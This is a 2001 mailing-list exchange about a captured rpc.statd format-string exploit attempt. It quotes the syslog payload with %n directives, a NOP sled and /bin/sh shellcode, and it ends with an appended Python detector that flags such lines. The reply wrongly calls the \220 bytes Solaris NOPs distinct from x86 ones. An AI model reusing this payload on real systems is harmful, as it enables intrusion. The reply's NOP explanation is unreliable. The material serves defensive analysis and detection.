I don't recall what port rpc.statd binds to, but what it is is a part of the NFS system, so disabling rpc.statd, I think, will also break NFS mounting on your side. You can still mount remote systems, I think.

And, yes, it is a hack attempt... by some scriptkiddie trying to use a common buffer overflow in rpc.statd... only problem is that he's using the Solaris overflow, not the i386 one... see all those \220s? Those are Solaris NOOP codes used to overflow the buffer. x86 NOOPs are \90 iirc... at any rate, turn off NFS and you turn off rpc.statd. You could use a program like snort to alert you to other attacks like the one directed at your machine. You might want to check your /etc/services to see if it says where rpc.statd usually sticks itself.

hope this helps any

--
Curtis Hogg
[EMAIL PROTECTED]
----------------------------------------------
The White Rabbit put on his spectacles. "Where shall I begin, please your Majesty?" he asked.
"Begin at the beginning," the King said, very gravely, "and go on till you come to the end: then stop."
-- Lewis Carroll
----------------------------------------------
Email 1 - [EMAIL PROTECTED]
Email 2 - [EMAIL PROTECTED]
WWW - [in transit]

On Sun, 11 Mar 2001, hanasaki wrote:

> The following showed up in my syslog the other day.... Is this possible
> hacking?
>
> What port is rpc.statd on?
> What does it do?
> What will break if it is turned off? and how to turn it off?
> Only a few, selected ports, are listened on. The last rule in my
> firewall script is ipchains -l -A input -i eth0 -j DENY.
>
> thank you.
>
> ------------------------------------------------------------------------
>
> Mar 11 17:55:25 hostname /sbin/rpc.statd[156]: gethostbyname error for ^X<F7><FF>
> <BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7>
> <FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> Mar 11 17:55:25 hostname
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\21
> 1<F3><B0>^K<CD>\200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
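As an added example (not part of this thread, and not the poster's log), a small Python checker that applies the reply's advice from the defender's side: it scans syslog for rpc.statd `gethostbyname error` lines and flags the ones whose "hostname" is really a payload, using the features visible in the quoted log, printf-style directives (`%8x`, `%n`) and long runs of the syslog-escaped byte `\220`. The sample lines inside are constructed and abbreviated.

```python
import re

# Constructed sample syslog lines (abbreviated; not the original poster's log).
# syslog renders non-printable bytes as ^X, <F7> or octal escapes such as \220.
SAMPLE_SYSLOG = """\
Mar 11 17:50:01 hostname /sbin/rpc.statd[156]: gethostbyname error for nfsclient.example.invalid
Mar 11 17:55:25 hostname /sbin/rpc.statd[156]: gethostbyname error for ^X<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\\220\\220\\220\\220\\220\\220\\220\\220\\220\\220\\220\\220
Mar 11 18:00:00 hostname sshd[201]: Accepted publickey for admin from 192.0.2.10
"""

STATD_RE = re.compile(r"rpc\.statd\[\d+\]: gethostbyname error for (?P<host>.*)$")
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]+$")      # what a genuine lookup target looks like
FMT_RE = re.compile(r"%\d*[xn]")                   # printf directives: %8x, %236x, %n
NOP_RUN_RE = re.compile(r"(?:\\220){8,}")          # 8+ consecutive escaped \220 bytes
NONPRINT_RE = re.compile(r"<[0-9A-F]{2}>|\^[@-_]")  # syslog's control/high-byte rendering


def classify(line):
    """Return a report dict for an rpc.statd gethostbyname line, or None if not one."""
    m = STATD_RE.search(line)
    if m is None:
        return None
    host = m.group("host")
    if HOSTNAME_RE.match(host):
        return {"host": host, "verdict": "benign", "format_directives": 0,
                "percent_n": 0, "nop_run": 0, "nonprintable": 0}
    directives = FMT_RE.findall(host)
    nop = NOP_RUN_RE.search(host)
    report = {
        "host": host[:40],  # truncated for display only
        "format_directives": len(directives),
        "percent_n": sum(1 for d in directives if d.endswith("n")),  # %n writes memory
        "nop_run": len(nop.group(0)) // 4 if nop else 0,             # each \220 is 4 chars
        "nonprintable": len(NONPRINT_RE.findall(host)),
    }
    # A %n directive, a NOP run, or several raw bytes in a "hostname" is not a lookup failure.
    hostile = report["percent_n"] > 0 or report["nop_run"] > 0 or report["nonprintable"] >= 4
    report["verdict"] = "hostile" if hostile else "suspicious"
    return report


def scan_syslog(lines):
    """Classify every rpc.statd gethostbyname line; all other lines are ignored."""
    return [r for r in (classify(l) for l in lines) if r is not None]


if __name__ == "__main__":
    for r in scan_syslog(SAMPLE_SYSLOG.splitlines()):
        print(r["verdict"], r["host"])
```

Pipe real syslog through `scan_syslog` (or feed it to a snort-style alerting rule) to catch this pattern without relying on the daemon staying up to log it.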